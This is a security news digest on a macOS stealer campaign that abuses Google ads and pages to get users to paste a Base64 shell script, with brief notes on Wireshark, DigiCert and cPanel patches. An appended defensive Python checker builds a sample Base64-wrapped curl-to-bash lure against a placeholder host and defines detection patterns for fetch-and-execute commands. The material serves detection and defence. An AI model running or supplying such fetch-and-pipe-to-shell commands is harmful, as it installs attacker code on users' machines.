
Mac Sync Stealer Malware Campaign Exploits Google Ecosystem and Multiple Security Updates
On May 4, 2026, the SANS Internet Storm Center reported on a Mac Sync Stealer malware campaign that exploits Google's ecosystem, including paid ads and Google Pages infrastructure. The attack begins with malicious ads for "HomePro" (a misspelling of Homebrew) hosted on business.google.com, which lead victims to a fake installer page on sites.google.com. The installer prompts users to paste a Base64-encoded shell script into their terminal; the script downloads additional tools and malware, bypassing some macOS security warnings.

Wireshark 4.6.5 was released, patching 43 vulnerabilities discovered via AI tools, some of which enable code execution. The release also updates the UI to include a donation prompt.

Microsoft Defender for Endpoint incorrectly flagged DigiCert's root authority certificates as malicious after DigiCert reported a compromise in which 60 fraudulent certificates were issued and later revoked.

A widely exploited vulnerability in cPanel was also highlighted. Patches are available, and administrators are urged to verify auto-updates because of active exploitation.
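The paste-into-terminal step of the Mac Sync Stealer campaign described above can be inspected without running anything. The following Python sketch is an added example, not code from the SANS report: it decodes Base64 runs found in a pasted one-liner and flags fetch-and-execute behaviour in the outer and decoded text. The indicator patterns, the 24-character threshold and the sample command (with a placeholder URL) are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Base64-alphabet runs long enough to hide a command (24 is an assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Illustrative behaviours to flag; not an exhaustive list.
INDICATORS = {
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "network_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
}


def decode_candidates(pasted: str) -> list[str]:
    """Decode each Base64 run that yields readable text. Nothing is executed."""
    decoded = []
    for match in B64_RUN.finditer(pasted):
        token = match.group(0)
        token += "=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64 text, e.g. a long path or identifier
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def assess(pasted: str) -> dict:
    """Summarise what a pasted one-liner does, from its outer and decoded text."""
    decoded = decode_candidates(pasted)
    hits = sorted({name for text in [pasted, *decoded]
                   for name, rx in INDICATORS.items() if rx.search(text)})
    # Hidden content that ends up in a shell is the pattern worth stopping on.
    return {"decoded": decoded, "indicators": hits,
            "suspicious": bool(decoded) and "pipe_to_shell" in hits}


# Constructed sample: placeholder URL, same shape as a paste-to-terminal lure.
SAMPLE_PAYLOAD = "curl -fsSL https://example.invalid/install.sh | bash\n"
SAMPLE = (f'echo "{base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()}"'
          " | base64 -D | bash")

if __name__ == "__main__":
    report = assess(SAMPLE)
    print(report["indicators"], "suspicious:", report["suspicious"])
    for layer in report["decoded"]:
        print("decoded:", layer.strip())
```

The same check can sit in a help-desk triage script or a clipboard-inspection tool; it reads the command as text only and never passes it to a shell.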